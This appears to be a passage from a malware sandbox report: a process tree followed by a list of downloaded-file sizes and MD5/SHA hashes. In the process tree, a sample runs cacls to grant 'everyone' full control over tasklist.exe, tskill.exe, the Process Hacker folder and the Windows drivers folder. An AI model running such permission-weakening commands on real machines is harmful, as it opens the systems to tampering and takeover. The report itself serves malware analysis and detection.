C:\Windows\system32\cacls.execacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F5⤵PID:1300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:3608
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\tskill.exe" /grant "everyone":F5⤵PID:2272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:4092
-
-
C:\Windows\system32\cacls.execacls "C:\Program Files\Process Hacker 2" /grant "everyone":F5⤵PID:3460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:4300
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\System32\drivers" /grant "everyone":F5⤵PID:2224
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:3192
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5540628cd868694b35e78a2fcf3c64106
SHA16dc3aae3f14f9fd333dadc0bac58b0751d3cf939
SHA2561f6ceaf20791c6c4522c1f95cc79df61b7b64feaf96d819176611bc3ad9c8386
SHA512e047ba3efc8b5c5962f8b113641207ea8de4b8e0ca09db0e7f1941fbd99169c7cc6e32eef0433552b6334c19568bdb7666e530d4cb44a425ad2757969b702a37
-
Filesize
1KB
MD53317a33cfc29c6ccd4b3d4e94e887b83
SHA18bcc561db8233af2e53aa0548bd532c37582b3e8
SHA256818db7a461050a56d683cd331832cb3d7ea6a8260daaf175b7ee3934b5bf89ad
SHA512d57b8e47c5a38a8585a82bc1114de35cf255c33d9c87b72f5eb065f4afc3ca40ca27c558890cc3d84ddaadd756c66ca7f820867a95358d12aaf1ede869002576
-
Filesize
1KB
MD5015a2f88c69d91d7e87ee412f7def503
SHA1d7a84f1a0a4c97d0d67a55b82572ed256053dffb
SHA256c6fa726a4a259b764f77ba44940ed5ee3c244c3b3909a9638dff848420ca31e6
SHA51265c019ea42873787e0a646ec6b3378f3f532266471208525caa120c6cf414fc6841c1ca11ec5939141a1f9b6d91ff9cc5370d3dcfe398519add9fd602ff0313d
-
Filesize
1KB
MD5323b17a21bfad9d01e2c03e58b513b0d
SHA17ca1b21a9591a011f048aa4e6092a61e5e70c1e7
SHA2560dceda91d69e537d9a956e8774e1d427e680ee2b977725740a38dd484bbc539a
SHA51291f2428baea9fa428fb09f04697a8332866570a96f5043bb39ece723a3650ff11b280194b9ee9f56db076336fdf5adc066ec802dbd95be7981a99bc7831aef30
-
Filesize
1KB
MD54bb8e80ea32fe402db660aadca80bc32
SHA14d24b3f399d60cc47e1a9bb0ef148617ae2112ee
SHA25634aa7b0a90077bff594711813f76ca10566d3c150019b246da43e2f6f245e155
SHA512d96240298969f5fbf9fdac06b851f5e3465427e1bb25f1a83c434f572f2bca6a097820f6ce27dc009b2919cb94f7f1525f810325d45df31709f2762925c580b3
-
Filesize
1KB
MD57e9669d4b64d08125fee6f323e12d8d0
SHA10426d4ebc4d5b0664e3de4753abb070ec7f5fa8a
SHA256fa6d98ca7c3a3f89e921b23d4493210fe6755a1f8db913fe1109cc6b2e33cb80
SHA5128ac0090e79f769f3ae5c65a42a882e4e59458e42dea9eea09b47e237599177eb6ff8863d47ee1d7102784661537636f79d90b25834a9d62d49b3668a84116634
-
Filesize
1KB
MD5ef199f83a2490dfd03ac845750e8aa29
SHA159ef459ed8c94e1da5662ae692876ef3026739b9
SHA25622b1702f808d989aeb889c39dedb3431d7da8fcc057aafd6d6699a5645010f5d
SHA5129b6c6f625744cd9565f582c465c63bef45674a6bb66b502c9eb60b2a06ca0e9538a644800249bbf218511ce4284e4ba64a63091d299873b7c58a9f999155c72c
-
Filesize
6KB
MD585cf1f3b6f9d4428301cb7f0802b3adf
SHA14ca5d619e7932463567a17864e29ac3788fe85dc
SHA2565e9db9e4a9c4eb22a63a6021c890ae843f85dc0e54e5300e33f63564aaa60e03
SHA512152f7f07c2a434aff729cee58a7c135a8d9b6c7a4a4334d51d5aa738617b87833ae0b79b87cefd8d4c6ab428d3cac00d46cf9c4d9c029acd8f07205b85cda074
-
Filesize
6KB
MD5dd0b1bb28a2fadfbf252340f51b50087
SHA19c46f0b0947e600470baca4d07e59876d102055f
SHA2560be3fd6c96c128a71c1275329f47e44fed338bcb0627f063f4fca1cdab8add21
SHA512f90ccf70461cab01c0e0547bdae8eeb43051f87f7e7850a5c7dcf94b36ae0be295b18cd45c82c23acef23803232711180e062f61c009658685f4b78dfe31a466
-
Filesize
6KB
MD54d548231eb768ecd9131f64d09a5f484
SHA10cefa9b3b714d9a69d8d823e4055b6910c504380
SHA2566099be65f020332b34a45b52f34ad086db20d6f95ec690db93d4b5c5c68f6ee3
SHA512b6ef58d2d4375e0df55b49165cc19fec267deec221058b8b8c9485957a65380e2558f9e49e54fb4d3cf2ca59c9443ae9e09e67d330455cca121551c1b2d424f7
-
Filesize
136KB
MD5626b64b810b25479669c363bae353195
SHA1cd2bd5040118a9018218449d7f60e115623fab81
SHA256234e3c52da389cfb14a0b3cdf45811f691e8d74f39d38645b043c8e4f11141be
SHA512d7f5f02533cc271bfdfd89a6cdbb469a38ece09c66c6ae279d610eac04d064f2a94d9a4e0925804875417ba906ccbbdf23af806288a50f982175a64eb465ef12
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
5KB
MD5a645734f3bf4a2682cbaf546789ec0c4
SHA1fafcc11909412bf51f217e12dfaa93a15181a3e2
SHA2563b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0
SHA512efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d
-
Filesize
87KB
MD5aba9a3cf4e1db4602c25405987b809a6
SHA16cd545ea023ce9cdfe76607c6801cc11ff7d9e80
SHA256490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
SHA512e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
-
Filesize
247KB
MD5733eb0ab951ae42a8d8cca413201e428
SHA1640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
SHA25652d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
SHA512c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f
-
Filesize
139KB
MD511d457ee914f72a436fa4a8a8f8446dd
SHA1d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA5124c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b